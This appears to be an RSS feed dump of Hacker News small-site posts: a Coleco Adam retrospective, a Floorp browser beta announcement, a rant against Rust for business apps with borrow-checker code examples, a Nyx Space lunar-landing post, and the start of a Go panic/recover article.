    As was somewhat common at the time, video game makers would try to find a way to promote their game consoles as a computer. There were products for the Atari 2600 that would add a keyboard and BASIC. The Intellivision was initially announced with an extra module that could convert it to a computer, although it never really shipped. The thinking at the time was: get people (kids) hooked on a low-cost game console and they’ll spend a bit more to turn it into an actual computer.

    Although none of those video game console to computer products were well-received, Coleco decided to try it again in 1983 with the Coleco Adam, although they would take the different approach of creating an entire system.

    Coleco Advert: Meet Adam: the Colecovision family computer system, from Electronic Games, December 1983

    At the summer 1983 Consumer Electronics Show Coleco announced the Adam home computer system at a price of about $500 (about $1600 in 2025). This was an impressive price at that time, because in 1983, to get a full home computer system you would have to buy each component separately. You’d need the computer, of course, but also a disk drive and a printer. Each of those things would cost about $300 each (about $950 in 2025), so you’re looking at $900 for a full system (about $2800 in 2025). That’s an approximate price for an Atari system, a C64 system would likely have been a bit less, an Apple II system, much more.

    DAVES OLD COMPUTERS - COLECO ADAM

    The Adam system came with the primary 64K computer1 (Zilog Z80 running at a rather speedy 3.5Mhz, at least for an 8-bit computer), an integrated high-speed tape drive, SmartBASIC, SmartWriter, Buck Rogers game and a daisy-wheel printer. The Adam had a nice design with a detachable keyboard something not available with the Apple, Atari or Commodore. The tape drive was claimed to be as fast or faster than a floppy drive, which would certainly have been true with the glacially slow Commodore 1541 drive, but not likely faster than either the Atari or Apple floppy drives.

    Printers were often hard to hook up and configure so having one included was a real convenience. Of course, a printe was also not really a requirement, especially if you mostly played games, so could be eliminated from cost comparison by some.

    On paper, this all sounded pretty good. It would greatly simplify the purchase of a complete home computer system. You would get everything all at once, in one box! Although you’d probably need a big station wagon to get it home!

    There was also a version of he Adam that was called the ColecoVision Expansion Module #3. It cost slightly less because it plugged into the ColecoVision itself to use some of its hardware.

    This thing was big. Needs a banana for scale.

    Unfortunately when this shipped in late 1983, the price was increased to about $700 (about $2200 in 2025), making it a much worse deal. It also was plagued with availability and reliability problems2.

    Perhaps its biggest issue was that printer. As a daisy wheel printer it worked like a typewriter with a wheel of characters that would flip out one at a time, like a daisy and get imprinted on the page. However, it had several big problems: it was rather large, noisy, slow and unreliable. Worse, the printer provided power to the entire system. So if you had a problem with your printer then nothing worked.

    The Adam also took up an enormous amount of desk space. The computer was separate from the keyboard, unusual for home computers a the time, and that printer was again monstrous. Plus you’d still need a monitor (or small TV) of some kind. Because everything took up so much space you could not easily just use this with the family TV, for example. It really needed its own dedicated space.

    The high-speed tape drive was an interesting idea that was intended to circumvent the high cost of disk drives, which could be as much as $300 all by themselves in 1983. However no tape drive is going to be as fast or useful as a floppy drive and although this one was fast, it wasn’t enough. Spinning a tape at high speed is also noisy and the drives proved to also be unreliable. There was another big problem with the Adam: it would set off an electromagnetic pulse when powering it on, which could corrupt or even erase the contents of a tape that was in the drive.

    Coleco did ship a floppy drive for the Adam, but that was an extra cost and was likely rather rare.

    At the time, the Adam was positively received by the press. I remember that Compute! especially loved it and wrote about it a lot, although they did warn about reliability issues. They even started included BASIC listings for the ColecoVision, something that Family Computing also started doing.

    Unlike other computers of the era, the Adam did not boot into BASIC. Instead it booted into the SmartWriter word processor. To use BASIC, you had to insert the SmartBASIC tape and wait for it to load. The BASIC itself was nice enough and fairly compatible with AppleSoft BASIC on the Apple II.

    Although the Adam could play any ColecoVision game, there was little specific software made for the Adam, which certainly hurt its appeal as an actual computer.

    There were many fun commercials that tried to claim the Adam was the best thing ever, though!

    Due to the poor reliability, many Adam systems were returned as defective. It was rumored that the return rate was over 75% for some of the early systems. Coleco ended up losing a lot of money on the Adam and by the end of 1984 knew the writing was on the wall.

    The Adam was discontinued in January 1985, essentially giving its lifespan of about 14 months. The demise of the Adam also took down the ColecoVision itself, which was also discontinued later in 1985 as Coleco got out of the video game and computer market entirely due to big losses. Coleco eventually filed for bankruptcy in 1988, which some do attribute the Adam/ColecoVision as at least partially responsible.

    It is estimated that about 300,000 or so Adam computers were sold.

    I owned a Coleco Adam in the early 1990s for a hot second. I picked it up cheap at a flea market and I remember it that it came in an absolutely gigantic box that barely fit in my car! I really don’t recall what I did with it, other than set it up to make sure it all worked. I never had the space for in my small apartment at the time for it, so I definitely got rid of it, but I’m not sure how or where. I was selling things on Usenet auctions at the time, but shipping this would have been insanely expensive so I don’t feel like that would have been viable, but that feels like the most likely scenario.

    Last summer I went to FunSpot, a giant arcade and also a bit of a vintage museum, and they had a Coleco display with an Adam.

    The full Coleco display with ColecoVision and Adam.
    Here is a closeup of the Adam with the rare floppy drive.

    Today I do see Adams for sale on Facebook Marketplace from time to time. I do get tempted each time I see one, as there are SD card products available today that would make using the tapes unnecessary. The Brewing Academy even has a Fujinet and RAM expansion!

    Looking at Facebook Marketplace now, I see that someone near me has the ColecoVision Expansion Module #3 for sale at just $140!

    Editor: No, Paul, no.

    Product photo of Colecovision expansion module 3 in box
    With the ColecoVision plugged into the back, this thing takes up even more space!

    But for me, as unique and cool as it might be, the Adam just takes up far too much space and I can’t justify getting one.

    Do you remember the Adam? Did you have one? What did you think of it?

    Leave a comment

    ]]>
    https://www.goto10retro.com/p/the-coleco-adam-an-8-bit-personal hacker-news-small-sites-43218126 Sat, 01 Mar 2025 11:05:47 GMT
    <![CDATA[First Look at the v12 of Floorp (a new Firefox based browser from Japan)]]> thread link) | @akvadrako
    March 1, 2025 | https://blog.ablaze.one/4683/2025-02-20/ | archive.org

    *The Mac version is coming soon. Currently, it is only available on Linux and Windows now.

    We’re excited to announce that the Floorp v12 beta version is now live!

    After months of development and testing, it’s your turn to explore the new features. Join our Floorp v12 beta phase, share feedback, and help us improve the final version. Read on to learn more and get started!


    🚨 Before you install Floorp v12 beta 🚨

    Floorp v12 can be installed on the same environment as Floorp v11, but please make sure to back up your profile from v11 before attempting the installation. Especially for the workspace feature, there is no compatibility due to changes in the configuration⚠️.

    🔗 How to back up your profile:
    Check here for instructions

    🔗 For recovering important data from an old profile:
    Click here for more details

    This version also introduces a new technology called “Artifact Build”. With this, the release time has been drastically reduced to just a few minutes⏱️✨.

    However, due to this new technology, even in the BETA version of Floorp v12, the application icons on Windows and Mac are the same as the regular version. We apologize for any confusion this may cause🙏.


    ✨ What’s New in Floorp v12?

    🔧 Revamped Floorp Settings

    The new Floorp v12 now features a separated settings page to prevent confusion with Firefox’s built-in settings. This makes it easier to use Floorp’s unique features while reducing the risk of mixing them up with Firefox functions. The new modern design also looks pretty cool, and we will continue improving it in future updates!

    🚀 Rapid Release Tracking

    As previously announced, starting with Floorp v12, we are adopting Rapid Release Firefox as our base for the first time since Floorp v8! This means you can enjoy the latest Firefox features while experiencing all the new innovations from Floorp.

    🖥️ Refined Workspaces & Sidebar

    The Browser Manager Sidebar has been renamed to the “Panel Sidebar”, and it now features a floating mode for more flexibility. Additionally, workspaces are now shared across windows, making multitasking even smoother.

    ⚠️ Note: Workspace management and adding panel sidebars via the dialog are still under development and will become available in future updates.


    🛠️ About the Artifact Build

    This version also introduces “Artifact Build”, a new technology that significantly reduces release time to just a few minutes⏱️✨.

    However, as a result, even in the BETA version of Floorp v12, the application icons on Windows and Mac remain the same as the regular version. We apologize for any confusion this may cause🙏.


    🙏 Special Thanks

    We would like to extend our deepest gratitude to @NyanRus for co-creating Noraneko, the testbed browser that laid the foundation for Floorp v12 BETA. Additionally, we express our appreciation to Mozilla for developing Firefox, the origin of all these features.


    ⬇️ Try Floorp v12 BETA now!

    ➡️ Download Floorp v12 BETA

    ]]>
    https://blog.ablaze.one/4683/2025-02-20/ hacker-news-small-sites-43218012 Sat, 01 Mar 2025 10:42:17 GMT
    <![CDATA[Is Rust a good fit for business apps?]]> thread link) | @todsacerdoti
    March 1, 2025 | https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ | archive.org

    While you may hear a lot of harsh words about Rust is this rant, that doesn't have to mean it's a bad language. Rephrasing the classic: there are two types of programming languages: ones that people complain about and ones that nobody uses. I've started my journey with Rust in 2018 and I've been working in it full time since 2021.

    I love Rust a lot for many things: good std lib abstractions, ergonomics (to some extend), the best build toolchain in the world (I've tried many things, but cargo is easily number one across programming languages landscape). But mostly I love how it brought sanity into systems programming and gave a viable alternative to this hollow abomination called C++ (and CMAKE).

    But what do I mean by term business apps? Nowadays, its all sorts of services targeting various kinds of user/asset management, be it a bank portal, online shop or any other sort of ERP systems. This also covers ETL to huge extend, as they bring your focus outside of main concerns that Rust shines in.

    These systems usually have similar shell: a web service providing some API, a database to manage system information and all sorts of other service connectors.

    These systems are characteristic because their main complexity comes from the domain: which is not hardware/software related but it's more about modelling complexities of human interactions in code. Quite often the most performance-sensitive parts related to I/O access (databases, HTTP communication) and serialization and solved by tuning access to the other services we use, not the algorithms we write ourselves.

    These systems where famously written in many different languages, from Python/Ruby/JavaScript/PHP to Java/C#/Go. Question is: are business apps a good use case for Rust?

    Spoilers: in my opinion, No. Now lets explain why.

    Standard library

    One of the nice things about Rust is that its abstractions defined in standard library feel right in size and scope. On the other side, std lib itself is woefully lacking: no RNG, cryptography or serialization. Even some things that should have been language features since day one - like async traits and yield generators - are supplied as 3rd party macros.

    On the other side Rust package ecosystem is enormous. You have everything, from universal abstraction over file system with dozen of services supported, down to cross-platform Bluetooth driver that you can use to (literally) connect to your butt plug.

    While languages such as Go enable you to write pretty much entire HTTP service from standard lib alone, this bazaar-style package management comes with the burden: whenever you need to solve any mundane problem, you land in a space where everything has at least 7 different crates available, but half of them are actually a toy projects and most of them were not maintained for the last 5 years. And don't get me started about audits to check if one of 600 dependencies of your hello world app won't be used for supply chain attacks.

    It takes time and attention to to sift the wheat from the chaff. Attention that is limited and could be put to better use elsewhere.

    And while many of these concerns have sense in systems programming, since they cover very different environments with very slim-tailored constraints - like WASM in the browser or embedded devices where even Rust's minimal standard lib is too much - they don't matter so much in a context of business apps, where solid defaults for common problems are desired: which is one the reasons for Go and .NET popularity in this domain.

    Not abstract enough

    One of the fantastic parts of Rust is that it manged to - mostly - live up to credo of zero-cost abstractions: situation where the performance of your high abstracted code (i.e. iterator ops or futures) is basically the same as their hand-rolled equivalent.

    The problem is that Rust comes with some new concepts like lifetimes and mutability modifiers, that cannot be properly abstracted to the same degree as regular generics.

    If you played with Rust you probably already seen those different kinds of iterators for mutable/immutable references, which basically have the same implementation but require twice the boilerplate code. The reason why is that mutability is not a generic property in Rust and cannot be abstracted over.

    Some languages like Pony offer an ability to control read/write access to fields and variables, but does it in a way that enables safe "casting" between them. PS: I highly recommend learning Pony for its reference capabilities concept alone, which initially may seem to be more complex than Rusts mutability and borrow-checker but in practice is much more robust and avoids many pitfalls that Rust has, especially in multi-threaded programming.

    Dynamic trait references

    Since this rant already came to the topic of abstractions, let's talk about dyn Trait. First, let me praise Rust decision about explicitly showing references responsible for doing a virtual table dispatch in code.

    However Rust also decided to turn Box<dyn Trait>/Arc<dyn Trait> into fat pointers (similar to Go, and opposite to Java/.NET).

    Short explanation: unlike Box<T> which is basically a memory pointer, a memory representation for Box<dyn T> is two pointers - one for type's virtual table, and one for heap address where the corresponding object lives. This comes with few consequences:

    • If you're working with C foreign function interface, there's no right C primitive to support you. You need to rollout something of your own, that most likely won't be compatible with existing solutions. Bizarre design decision given how important native interop is for Rust.
    • If you want to introduce a lock-free mutability via Compare-And-Swap API (like the one that arc-swap offers) and use dynamics at the same time... well, get fucked. You'll need extra layer of indirection, since this API is only available for pointer sized things.
    • Some of the Rust APIs restrict you to work over Sized data - a types which size can be determined at compile time - which unfortunately puts a limitations on your generic params, i.e. if you ever want to use them in Box<T> context (since box pointer will have different size depending on what a T is).

    Rust provides a workaround in form of dedicated crates that offer thin dynamic pointers as well, but since they are not part of standard lib, it's unlikely that you'll be able to use them across different libraries in the ecosystem without extra work.

    Borrow checker: early adopter syndrome

    One of the biggest value proposals of Rust is borrow checker. If you ever thought about reasons to learn Rust: a borrow-checker and ownership model is the one. It changes the way how you think about object graphs.

    Rust is probably the first language that adopted borrow-checker as a regular tool in the non-esoteric language. However it comes with some drawbacks: at its current stage the borrow-checker is still not very advanced and extremely conservative, requiring programmer to do a lot of defensive programming and workarounds in order to make it happy. And most likely it will never be improved beyond minor points, as this would require a breaking change.

    In short: you can imagine borrow-checker as a recursive read/write lock enforced on all fields and variables at compiler level - at any time you can have multiple read-only references to the same object or one read-write reference, but never a mix of two. Additionally in order to have a reference of given type to a field in an object graph, you need to have the same (immutable/mutable) or stronger (mutable) reference to its parent.

    If we think in category of locks, you can imagine a deadlock problem: when A needs to wait for B, and B needs to wait for A to acquire their corresponding locks. In Rust borrow-checker, such situations are compiler errors. The same logic is used by Rust to operate on actual locks, but don't worry: it doesn't mean that Rust is deadlock free language.

    What it means however, is that there's no easy way to represent cyclic data structures in Rust (here's description of famous double-linked list problem), since - unlike pretty much any other language - it explicitly disallows you to have two mutable/immutable references to the same variable (even in the same thread).

    And speaking of cyclic data structures: you can actually sometimes implement them in straight forward manner with Rc<RefCell<T>>/Arc<Mutex<T>>, but the problem is that:

    1. RefCells can easily blow up since they work the same way like borrow-checker, but during runtime, while Mutex can deadlock at runtime. Neither of them is "zero cost".
    2. You need to keep track of references with strong and weak pointers, which is usually not an issue unless your object graph needs to be a bit more complicated for some reason. If not, you'll get a memory leak. One of the Rust promises was to reduce these, but it only works in comparison to traditional "systems" languages like C/C++. This comparison falls apart against managed languages.

    I get why it's there, but forcing it blindly and everywhere as a default behaviour is fucking bullshit: which apparently is acknowledged by the authors themselves, since the common way of getting immutable/mutable reference from an array is to split it into two separate references using method that operates using unsafe pointers under the hood. Shutout to all haters saying that unsafe Rust is not idiomatic: it's not only idiomatic, it's necessary.

    Borrow checker and encapsulation

    Another thing about borrow checker is that it has very shallow understanding of your code. It also explicitly makes a conservative assumption that if you call method over some reference, this method will try to access ALL fields of that references, forcing any other field accessed outside of it to be invalidated.

    Let's check this out on a following example:

    struct X {
        commit_offset: usize,
        entries: HashMap<u32, Vec<Entry>>,
        changed: HashMap<u32, Vec<usize>>,
    }
    
    impl X {
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.entries.get_mut(client) {
                // get iterator over uncommitted entries for given client
                for e in entries.as_mut_slice()[self.commit_offset..].iter_mut() {
                    if f(e) {
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

    Now let's try encapsulate it a little to make it more readable - nothing much, just encapsulate our cryptic for iterator statement to give it some context:

    impl X {
    	/// get iterator over uncommitted entries for given client
        fn get_uncommitted(&mut self, client: &u32) -> Option<&mut [Entry]> {
            let e = self.entries.get_mut(client)?;
            Some(&mut e.as_mut_slice()[self.commit_offset..])
        }
        
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.get_uncommitted(client) {
                for e in entries.iter_mut() {
                    if f(e) {
    	                /// compilation failure: get_committed already borrowed
    	                /// `&mut self` in a scope of if let, so we cannot access
    	                /// `self.changed`
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

    The second implementation will fail. Not because it's wrong, not because we broke something (in fact these two implementations are identical), but because it makes borrow checker sad.

    This is in fact recurring theme: when working in Rust, you'll often find yourself in situation when you need to split your types or methods in specific way, just because borrow checker says so. It's mandatory, even when it adds no value (or straight up removes it) to your project.

    Performance ceiling vs time to performance

    One of the common misconceptions about Rust is that apps written in Rust are fast because they are written in Rust. This is true to some extent if we compare them against dynamic languages like Python, Ruby or JavaScript, but it falls short when we start comparison with services written in i.e.. Go, Java or .NET.

    This is may be due to oversimplified view on the performance characteristics of real-world apps:

    1. Winning hyper optimization wars in micro-benchmarks rarely translate to visible results in business apps, where our own code is usually ~10% of the overall executed: rest is databases, web stacks, serializers etc.
    2. For those apps most of the optimizations are either done by proper database and network usage, system architecture and right algorithm pick. Language wrestling matters a lot less, at least when we talk about languages in the same performance "weight class".

    Moreover, picking Rust may cause a let-down in expectations about performance - I've seen people writing their apps in both Rust and i.e.. C# and noticing that their C# apps were actually faster. This again comes from another issue: when you first try, you probably will write your Rust app just well enough to make it compile, do actual task and avoid glaring performance issues. Most likely you'll stick to its defaults and - in business setting - this will be the last time when you try to optimise that piece of code.

    This boils down to the difference between:

    • Performance ceiling which means how possibly fast program written in a given language can be. This is usually low for dynamic languages (since they abstract a lot) but it's very high for Rust. However some platforms, i.e.. .NET or Swift where we can choose to work closer to the metal if we want to, this difference is not that significant.
    • Time to performance which basically means: "how long it takes to solve a problem with acceptable performance". And personally: Rust falls behind many managed languages on that metric, mainly because of things like borrow checker, and multi-threading issues etc. which I cover later.

    Your business app will probably be working over things like strings, byte buffers and object graphs to carry over business data between DB and web framework. This will mean that it will move and copy a lot of data around: something that default Rust primitives are not particularly great at ie. String::clone in Rust uses deep copy (where in managed languages it's just pointer copy), while String itself is just wrapper around capacity-bound Vec<u8> which means they may also be bigger than they need to be.

    Copying "references" can be much more expensive than in languages with managed memory because of ref-based garbage collector: i.e. for Vec<Arc<T>> means not only memcpy over vector heap space but also following increment of ref counters in every of the nested Arc pointers (including loading each of them from heap into register and coordinating new counter values between CPU caches).

    And since we're at Arc/Rc or even Box: once you need to deal with graphs of objects or moving data in between coroutines or threads, you'll see yourself using them quite a lot. The problem is that this technique of allocating is nowhere near as fast as bump pointer allocators that managed languages use. The actual win here is when we need to release memory: which in Rust doesn't introduce GC pauses. However modern runtimes i.e. Go or Java Z collector, can provide a constrained GC pauses that let us keep the latency in check to avoid pathological cases (which is fine enough for most business apps, except maybe HFT space). Moreover they can offset memory release to background threads, which is not the case in Rust and for big object graphs can also affect latency.

    And while technically Rust memory footprint would be expected to be lower, in practice that doesn't have to be the case (because of all the deep copying of heap objects and the fact that many of Rust pointers are pinned, causing fragmentation).

    Rust is NOT good for multi-threaded apps

    Some developers like to claim that - thanks to its strict borrow checker - Rust makes multi-threaded programming safe and reliable. This statement could probably hold in comparison against languages like C/C++, but once again it easily falls apart once you compare it against any of the contenders we described already.

    .await pain

    First problem is: building multi-threaded apps in Rust is simply painful. 2/3 of this pain comes from the fact that if you ever will have to do it, you'll most probably be put to work with async/await and tokio runtime.

    Once you need to work with Rust futures and async code, you'll get exposed to whole new world of dosing micro-complexities into your brain, i.e.:

    • How you cannot just access objects and their fields, but have to work with pinning and Unpin.
    • How to build async iterators: because while async_stream is there, from time to time you'll have to roll something by hand: and it's much harder process than any other language supporting this feature that I know of.
    • Differences between regular threads/locks, and their asynchronous equivalents.
    • Why the hell do you need async_trait and why it's even configurable.
    • How Send and Sync makes each of the issues above exponentially harder than they already are.
    • And how the fact that you have pluggable runtimes - and sometimes need to use more than one in your app, i.e.. tokio+rayon - makes things even more interesting.

    I think that this blog post is a good critique of current state of async Rust.

    If you're going to pass your objects across threads, Rust forces some constrains over the code you're writing - such as Send + 'static limitations - even if that code is executed in only a single execution scope at the time. The problem is that in tokio - a dominant runtime used in Rust ecosystem - a primary way of parallelizing work is via spawn method, that uses work-stealing scheduler: which moves the suspended executions from busy to idle threads as it seems fit. This usually requires ensuring that most of your async code base is Send + 'static compatible.

    What's nice about Send and Sync traits is that they are inferred from bodies of async methods that you implement. What's not nice is that they are not immediately visible, so you may accidentally break API guarantees by changing few lines somewhere down in a method call stack without even noticing, resulting in your methods no longer being forkable by tokio::spawn.

    Locks. Locks everywhere.

    In practice all of the Send + 'static' constraints mentioned above mean that all kinds of shared data now needs to be wrapped with Arc<Mutex<T>>/ Arc<RwLock<T>>. But which mutexes and locks are we talking about?:

    • Of course since std::sync::RwLock is basically a wrapper around OS primitives, it makes it very heavy. Most notably it doesn't cover async/await API, so it's going to block the threads from tokio thread pool, which is damaging for a server performance.
    • parking_lot::RwLocks are much more lightweight - since they use optimistic locking with atomic counters. They still don't offer async/await API though, potentially blocking thread pool in the process.
    • futures_locks::RwLock which sounds like a good idea if you aim for have runtime-agnostic async locks, until you look into the implementation and realize that it's just bait and the whole thing is using regular locks inside.
    • Tokio has its own RwLock which offers async/await API but it comes with some caveats, like:
      • If you use blocking lock methods inside of a context in which tokio runtime is available, it will straight up panic, crashing your app. And sometimes you just may have to call it in a context where runtime is available but your code cannot be async, calling for another layer of workarounds.
      • It doesn't offer reentrancy or upgradeable locks (promoting read locks into write ones).
    • Finally async_lock::RwLock which offers async/await API, optimal implementation, lock upgrades and doesn't crash your server because the author didn't like the way you're using his library. PS: don't worry I don't like it either, but I'm here to do what I can with what I have in hands, not to write poetry.

    So once you finally get your PhD from lock algorithms in Rust, you finally are at the level where you can do the job as efficiently as Go dev after learning the whole language in 2 hours. And god forbid ask yourself a question: why do I need to use locks if this code is never accessed concurrently?

    The best part is that - unlike ie. Pony - Rust compiler doesn't guarantee absence of dead locks in your code. Even better: since locks are so wide spread, they are even more likely to occur. It doesn't even have to happen because you're using them wrong, just because you didn't know that the code that you're calling is using them somewhere below (sending changes over tokio::watch channel itself is a great example of that).

    Actors

    One of the stunning issues I've found in Rust is that, given how well borrow-checker ownership matches the actor model, the actor libraries in Rust are lacking. I'm not talking about all of them, since I didn't have a time nor energy to check out every out of 47 actor libraries listed for a good start, but that number strongly suggests syndrome where after first few every new attempt was trying to solve some issues with existing implementation, creating new ones in the process. If you're using them for your business app, most likely it will be one of the 3 most popular, and most likely it will be actix, because you've been baited by its popularity and pretty mature web framework attached to it.

    The problem with Actix is that its core has been defined before the era of async/await Rust. This means that it doesn't natively support async actor methods - and if you need a server app doing any kind of I/O, you WILL have to use async Rust eventually. Eventually some support for async had been added, but now you need to educate yourself which of the 4 different responses that suport futures should be used in which situation. AFAIK none of these support using &mut self actor in async method (and we don't count actix_async_handler since it has list of limitations longer than the actual documentation). It's about as handy as using a knife with 4 different blades but no handle.

    In practice, the most popular pattern I've seen was simply using a tokio channel combined with tokio::spawn, which essentially is a retarded cusin of actor: more verbose and missing all of its benefits like structured message handling, lifecycle management, state encapsulation, parent-children hierarchies etc.

    Panics

    While Rust errors are pretty safe - thanks to being a part of method declaration - they are not alone: panics are still there. And unlike errors, you'll never be 100% sure that you're avoided all of them. Technically you could use some way to notify about their existence i.e.. by using unsafe brackets or something, but in practice it's hard to be sure.

    One of the issues are ever-present .unwrap calls. Technically they are meant to be used with caution, but if you're glossing over the code base, the only difference between hash_map.get().unwrap() (which can happen often) and path_buf.to_str().unwrap() (which most likely will never happen in your app) is your experience.

    Other issues include:

    • Panics on index accesses.
    • Panics of double borrow/borrow_mut from RefCells - which are perfectly fine in many languages but in Rust will crash your entire app because borrow checker doesn't like second guesses.
    • Panics with stack overflows because the state machines generated by your async methods may be a "bit" bigger than expected: but at least no code has been heap-alloc'ed while solving this problem.

    What's important to notice here: we're talking about panics that will crash your server, affecting not only the current request handle but everyone using your services. That's the major difference between Rust failures and exceptions used in managed languages. And sure you could say that these can be fixed with proper programmer discipline, but isn't the Rust promise of compiler taking care of dangerous coding mistakes the reason why we put and effort to learn it and deal with all of the borrow-checker bullshit along the way?

    Death by a thousand cuts

    Individually the issues above can often be easily solved with some of the experience, and casted off as a "skill issue". But together they build up into developer's mental fatigue: you're here to solve business problems, yet on every step you need to solve "plumbing issues", make decisions about memory model including possible feature changes and refactoring they'll require in the future. Each one of them is considered crucial by borrow checker to a point where it either cause compilation error or runtime panic.

    There are places where fine-grained control over program memory and performance tuning is beneficial and can be one of the business goals: these are things from broad area of system engineering. However for your daily ERP app the complexity coming from trying to reflect real-life interactions with all their exceptionality and imprecisions is enough: you're not going to be praised because your asset management app takes 10% less CPU while the task backlog has doubled in the meantime.

    So if you're a founder or developer thinking if you should use Rust for your next business project because some crypto start-up is developing their quasi-bank in it and it would look nice in your resume, please think twice and don't make regrettable decision for yourself and your colleagues.

    ]]>
    https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ hacker-news-small-sites-43217892 Sat, 01 Mar 2025 10:20:34 GMT
    <![CDATA[Nyx Space and Rust Power Firefly's Blue Ghost Lunar Landing]]> thread link) | @lukastyrychtr
    March 1, 2025 | https://nyxspace.com/blog/2025/02/21/nyx-space-and-rust-power-fireflys-blue-ghost-lunar-landing/ | archive.org

    On March 2, 2025, Firefly Aerospace will attempt to land its Blue Ghost 1 spacecraft on Mare Crisium, a vast lunar plain on the Moon. This historic mission, which you can follow via live stream on YouTube or through official updates, is powered in part by Rust—specifically, by the open-source Nyx Space libraries: Nyx, ANISE, and Hifitime.

    These libraries form the backbone of the mission's flight dynamics toolset. Here’s how they’re helping guide Blue Ghost to its lunar destination.

    Nyx Space libraries are open source: Nyx under AGPL 3.0 and ANISE/Hifitime under MPL 2.0. By releasing these tools publicly, we aim to empower engineers across industries—from aerospace startups to academic researchers—to build robust solutions to challenging problems. Astrodynamics is hard enough as it is, use Nyx Space instead of reinventing the wheel.


    ANISE: Precise Trajectory Computations

    Since the 1980s, NASA's SPICE toolkit has been essential for interplanetary missions. ANISE builds upon this legacy as a modern, fully-featured rewrite in Rust. It introduces significant enhancements, including azimuth, elevation, and range (AER) computations, safe multi-threading, and Python bindings via PyO3.

    For Blue Ghost, ANISE generates data products for all subsystems from the trajectory files provided by the flight dynamics team (FDO). Its accuracy has already been proven: ANISE correctly predicted the spacecraft's first eclipse to within one second of when it actually occurred—a testament to its precision.


    Hifitime: Synchronizing Ground and Space

    Executing maneuvers with sub-second precision is critical for mission success. The FDO team—led by Chris Rabotin—requires that maneuvers occur within 100 milliseconds of their planned time; any deviation means that the gravitational acceleration from celestial objects like the Earth or Moon are different relative to the expectations during the maneuver planning.

    Hifitime ensures this precision by handling time scale conversions between Ephemeris Time (ET), used in trajectory data for its consistency in cislunar space, and UTC, which governs ground systems. ANISE complements this by calculating light-time delays between Blue Ghost and ground stations while accounting for relativistic effects such as aberration. Together, these tools ensure flawless timing synchronization between Earth and space.


    Nyx: High-Fidelity Orbit Determination

    Above GPS altitudes, spacecraft cannot rely on satellite navigation. Instead, they depend on ground-based tracking data processed through orbit determination algorithms. Nyx excels in this domain.

    Nyx is a high-performance library for spaceflight dynamics that incorporates advanced models such as non-spherical gravity fields and solar radiation pressure. It directly ingests CCSDS TDM —the standard format for spacecraft tracking data—and processes it using its Kalman filter for high-fidelity orbit determination. This capability had previously been validated in real-world scenarios like the Lunar Reconnaissance Orbiter example.


    If you've read this far, let's chat!

    ]]>
    https://nyxspace.com/blog/2025/02/21/nyx-space-and-rust-power-fireflys-blue-ghost-lunar-landing/ hacker-news-small-sites-43217811 Sat, 01 Mar 2025 10:09:25 GMT
    <![CDATA[The cost of Go's panic and recover]]> thread link) | @todsacerdoti
    March 1, 2025 | https://jub0bs.com/posts/2025-02-28-cost-of-panic-recover/ | archive.org

    TL;DR

    • Some of the wisdom contained in Josh Bloch’s Effective Java book is relevant to Go.
    • panic and recover are best reserved for exceptional circumstances.
    • panic and recover are slow, incur heap allocations, and preclude inlining.
    • Internal handling of failure cases via panic and recover is tolerable and sometimes beneficial.

    Abusing Java exceptions for control flow

    Even though my Java days are long gone and Go has been my language of predilection for a while, I still occasionally revisit Effective Java, Joshua Bloch’s seminal and award-winning book, and I never fail to rediscover nuggets of wisdom in it. In item 69 (entitled Use exceptions only for exceptional conditions) of the book’s third edition, Bloch presents an example of abusing Java exceptions for control flow. I’m hesitant to quote the content of that section in full here for fear of a copyright strike from Bloch’s publishing company, but it—and, in fact, the whole book—is well worth a read.

    Bloch opens with the following code snippet, which demonstrates a rather peculiar way of iterating over an array (named range) of objects of some Mountain class so as to invoke their climb method:

    try {
      int i = 0;
      while (true)
        range[i++].climb();
    } catch (ArrayIndexOutOfBoundsException e) {
    }
    

    Note that variable i eventually gets incremented up to the length of the array, at which point an attempt to access the array at i raises an ArrayIndexOutOfBoundsException, which gets caught and promptly ignored. Of course, a functionally equivalent but far clearer and more idiomatic approach consists in relying on a “for-each” loop, which itself amounts to a classic three-clause loop:

    for (int i = 0; i < range.length; i++) {
      range[i].climb();
    }
    

    Bloch patiently proceeds to explain why some misguided practitioners may favour the exception-based approach over the more idiomatic one: not only do they perceive the termination test (i < range.length) as costly, but they deem it superfluous. Why? Because they believe that the Java compiler introduces a bounds check for every array access (range[i]). If memory safety is guaranteed by those systematic bounds checks, they reason, why even bother checking whether the index variable goes out of bounds?

    Bloch then debunks this theory via three counterarguments:

    1. Because exceptions are designed for exceptional circumstances, there is little incentive for JVM implementors to make them as fast as explicit tests.
    2. Placing code inside a try-catch block inhibits certain optimizations that JVM implementations might otherwise perform.
    3. The standard idiom for looping through an array doesn’t necessarily result in redundant checks. Many JVM implementations optimize them away.

    Follows this empirical observation:

    […] the exception-based idiom is far slower than the standard one. On my machine, the exception-based idiom is about twice as slow as the standard one for arrays of one hundred elements.

    How is this relevant to Go?

    The designers of Go deliberately shied away from equipping the language with an exception system like Java’s:

    We believe that coupling exceptions to a control structure, as in the try-catch-finally idiom, results in convoluted code. It also tends to encourage programmers to label too many ordinary errors, such as failing to open a file, as exceptional.

    Go takes a different approach. For plain error handling, Go’s multi-value returns make it easy to report an error without overloading the return value. A canonical error type, coupled with Go’s other features, makes error handling pleasant but quite different from that in other languages.

    Go also has a couple of built-in functions to signal and recover from truly exceptional conditions. The recovery mechanism is executed only as part of a function’s state being torn down after an error, which is sufficient to handle catastrophe but requires no extra control structures and, when used well, can result in clean error-handling code.

    However, some newcomers to Go may, at least at first, struggle to adopt the language’s idiom of communicating anticipated failure cases as values rather than as exceptions; they may be tempted to abuse Go’s panic and recover built-in functions for communicating even benign failure cases.

    Go’s ecosystem (language, compiler, runtime, etc.) may be vastly different from Java’s, but transposing Bloch’s experiment from Java to Go is nonetheless an instructive and playful way to discuss the cost of panic and recover, and perhaps stifle newcomers’ urge to unduly rely on that mechanism in their programmes.

    Abusing Go’s panic/recover for control flow

